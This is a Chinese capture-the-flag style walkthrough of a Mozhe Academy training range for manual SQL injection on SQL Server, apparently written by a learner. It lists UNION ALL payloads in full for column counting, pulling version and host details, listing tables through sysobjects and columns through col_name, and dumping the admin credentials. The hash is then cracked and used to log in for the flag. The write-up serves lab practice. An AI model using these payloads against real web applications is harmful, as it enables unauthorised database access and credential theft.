墨者学院；SQL手工注入；靶场；SQLsever；

1、启动靶场环境；

一颗墨币启靶场；

点击右下角；

2、SQLServer有三个权限级别：

sa权限：数据库操作，⽂件管理，命令执⾏，注册表读取等system：SQLServer数据库的最 ⾼权限

db权限：⽂件管理，数据库操作等权限 users-administrators

public权限：数据库操作 guest-users

使用'

报错，有注入点；

3、输入and 1=1正常

and 1=2报错--->数字型注入实锤了；

4、判断出字段为4个字段；等于实际字段数不报错，大于或小于实际字段数会报错

orderby 5

orderby 4

orderby 3

5、判断回显字段，这里使用联合查询union；记得在sqlsever中要加all，占位符使用null；

union all select null,null,null,null

这里将前面id=2修改为id=-2;回显2时加上'',便可以回显成功了；

?id=-2 union all select null,'2',null,null

?id=-2 union all select null,'2','3',null

6、这里尝试一下用带引号的字符串占位，看一下会不会报错；

发现并没有报错；

?id=2 union all select '1','2','3','4'

加上"-"试一下；

?id=-2 union all select '1','2','3','4'

也可以回显，之前练习出了些许问题；

有可能是SQLserver里面对中文输入法下的“=”，和“-”会识别错误；

中文空格和英文空格会导致url编码不一致，导致查询错误；

UNION 内部的每个 SELECT 语句必须拥有相同数量的列。列也必须拥有相似的数据类型;

7、查看数据库版本；数据库名字；

?id=-2 union all select '1',(select @@version),(select db_name()),'4'

8、查数据库主机名；数据库拥有者；

?id=-2 union all select '1',(select host_name()),(select user),'4'

dbo是数据库默认用户，具有所有者权限；

9、有安装⾃带的数据表sysobjects和syscolumns等

sysobjects：记录了数据库中所有表，常⽤字段为id、name和xtype。

syscolumns：记录了数据库中所有表的字段，常⽤字段为id、name和xtype。

id为标识，name为对应的表名和字段名，xtype为所对应的对象类型

10、爆表;manage；

top n #查询前n条记录;

limit 2,3 #查询第2条开始的3条数据;

查询dbo.sysobjects表中⽤户创建的表，获取其对应的id和name

dbo.sysobjects 系统⾃带库 xtype='U' 是指⽤户创建的表

?id=-2 union all select '1',(select top 1 name from mozhe_db_v2.dbo.sysobjects where xtype='U'),'3','4'

获取manage对应id；

?id=-2 union all select null,id,name,null from dbo.sysobjects where xtype= 'U'

找到第二张表和其对应id；

?id=-2 union all select null,id,name,null from dbo.sysobjects where xtype= 'U' and id <> 5575058

没有第三张表了；

?id=-2 union all select null,id,name,null from dbo.sysobjects where xtype= 'U' and id <> 5575058 and id <> 101575400

11、爆字段

object （）：数据库中每个对象都有一个唯一的id值，object_id(name)可以根据表对象名称得到表对象的ID，object_id()只能返回用户创建的对像的ID,像以sys开头的表都是系统表所以返回不了的

col_name（）：可以根据id值得到对像的名称，而且可以返回指定下标的结果.

?id=-2 union all select 1,(select top 1 col_name(object_id('manage'),1) from sysobjects), '3' ,4

?id=-2 union all select 1,(select top 1 col_name(object_id('manage'),2) from sysobjects),'3',4

?id=-2 union all select 1,(select top 1 col_name(object_id('manage'),3) from sysobjects),'3',4

12、爆数据

?id=-2 union all select top 1 null,username,password,null from manage

admin_mz

72e1bfc3f01b7583

?id=-2 union all select top 2null,username,password,null from manage

只有一条..........

13、md5在线解密；

97285101

14、登陆去了..........

admin_mz

97285101

恭喜你 admin_mz 成功登录用户管理后台，KEY： mozhe503bb739fd11b93e4112e89edbb

15、提交key